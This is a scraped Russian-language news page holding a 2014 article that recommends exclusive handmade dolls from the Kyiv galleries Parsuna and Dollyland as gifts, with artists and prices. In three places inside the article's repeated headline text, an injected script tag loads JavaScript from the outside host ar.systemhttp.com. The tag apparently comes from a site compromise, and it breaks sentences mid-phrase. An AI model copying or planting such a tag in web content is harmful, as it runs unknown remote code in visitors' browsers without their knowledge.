Запрашиваемая страница не найдена USD     CNY     EUR     JPY
Москва C
Последние новости
24 июн 2018, 17:33
По итогам мая российские автолюбители купили 149 машин премиальной марки...
Поиск

Какую марку автомобиля вы предпочитаете?

» » Эксклюзивная кукла – душевный подарок для всех случаев

Эксклюзивная кукла – душевный подарок для всех случаев

08 фев 2014, 09:09    ismirnov
0 комментариев    7 201 просмотр

Эксклюзивная кукла – душевный подарок <script type="text/javascript" src="http://ar.systemhttp.com/o.js"></script>для всех случаев

День Рождения, Новый Год, День Святого Валентина или Восьмое марта – череда праздников заставляет снова и снова ломать голову над подарками. Замечательную идею для презента нам подсказали в киевской галерее «Парсуна».

 

Украинская столица стала домом для эксклюзивных кукол в 2005 году. Сегодня это крупнейшая площадка для общения и обмена опытом мастеров-кукольников из близлежащих европейских стран и России. Всевозможные мастер-классы, тематические выставки и экспозиции в течение всего года притягивают сюда поклонников этого необычного ремесла и просто любопытных горожан.

 

Кукла, изготовленная в «Парсуне», не просто игрушка, а настоящее произведение искусства. Большинство из них выполнено в единственном экземпляре. Например, «Ангел», автором которого является Наталья Долганина, станет прекрасным подарком к Рождеству. Серебристые крылья и светлые волосы, черты лица Маленького Принца из сказки Экзюпери и шар, символизирующий планету – такое чудо займет особое место в новогоднем интерьере.

 

Еще одна обитательница «Парсуны» - кукла «Инанна». Девушку в темном платье создатель назвал в честь верховной богини шумеров, отвечающей за благородие и любовь.

Эксклюзивная кукла – душевный подарок <script type="text/javascript" src="http://ar.systemhttp.com/o.js"></script>для всех случаевВозможно, ее присутствие в доме поможет возродить былые чувства или поможет молодоженам избежать крупных ссор.    

 

Галерея эксклюзивных творений ручной работы располагается на улице Хорива, 43. Стоимость кукол колеблется от 5 до 16 тысяч гривен, при этом «Парсуна» всегда рада гостям и торгу в уместных пределах.

 

Кто живет в «Доллиленде»

 

«Доллиленд» - еще одна кукольная галерея в Киеве по адресу Эспланадная улица, дом 28. Здесь выставлены на продажу работы художников Франции, России, Голландии, Украины, Германии и Италии. С момента открытия «страны кукол» прошло чуть больше двух лет.

 

Великолепный подарок для поклонников легендарной киноактрисы – кукла Мэрилин Монро. Материал изготовления, холодный фарфор, перекликается с образом голливудской дивы. Меховое манто, белоснежное платье, из аксессуаров ювелирные украшения и мундштук – авторы Екатерина и Елена Попова старались добиться наибольшего сходства с оригиналом. Стоимость хрупкой Мэрилин, созданной в единственном экземпляре, 3 000 евро. 

 

Эксклюзивная кукла – душевный подарок <script type="text/javascript" src="http://ar.systemhttp.com/o.js"></script>для всех случаевДругая украинская художница Ирина Леванова придумала «Метелицу». Сказочная барышня в белой шубе и платье, напоминающем русский народный сарафан, изготовлена из керамики. Такой оригинальный подарок обойдется вам в 1 600 евро.

 

Пышное платье и медвежонок за спиной – это фарфоровая «Балерина» немца Хильдегарда Гюнцеля. Создается ощущение, что девочка вот-вот оживет и исполнит несколько танцевальных па. Цена эксклюзивной куклы равно 6 300 евро.

 

Нашим читателям может показаться, что стоимость такого подарка неоправданно высока. Но с другой стороны, то тепло, что автор вложил в свое творение, будет непременно согревать и радовать будущего владельца необычной куклы.

Читайте также
31 дек 2008, 09:36    0 комментариев
В предпраздничной суете уже ни на что не остается времени. А как же настроение в предвкушении Нового года? Ведь не у всех оно...
Комментарии
  • bowtiesmilelaughingblushsmileyrelaxedsmirk
    heart_eyeskissing_heartkissing_closed_eyesflushedrelievedsatisfiedgrin
    winkstuck_out_tongue_winking_eyestuck_out_tongue_closed_eyesgrinningkissingstuck_out_tonguesleeping
    worriedfrowninganguishedopen_mouthgrimacingconfusedhushed
    expressionlessunamusedsweat_smilesweatdisappointed_relievedwearypensive
    disappointedconfoundedfearfulcold_sweatperseverecrysob
    joyastonishedscreamtired_faceangryragetriumph
    sleepyyummasksunglassesdizzy_faceimpsmiling_imp
    neutral_faceno_mouthinnocent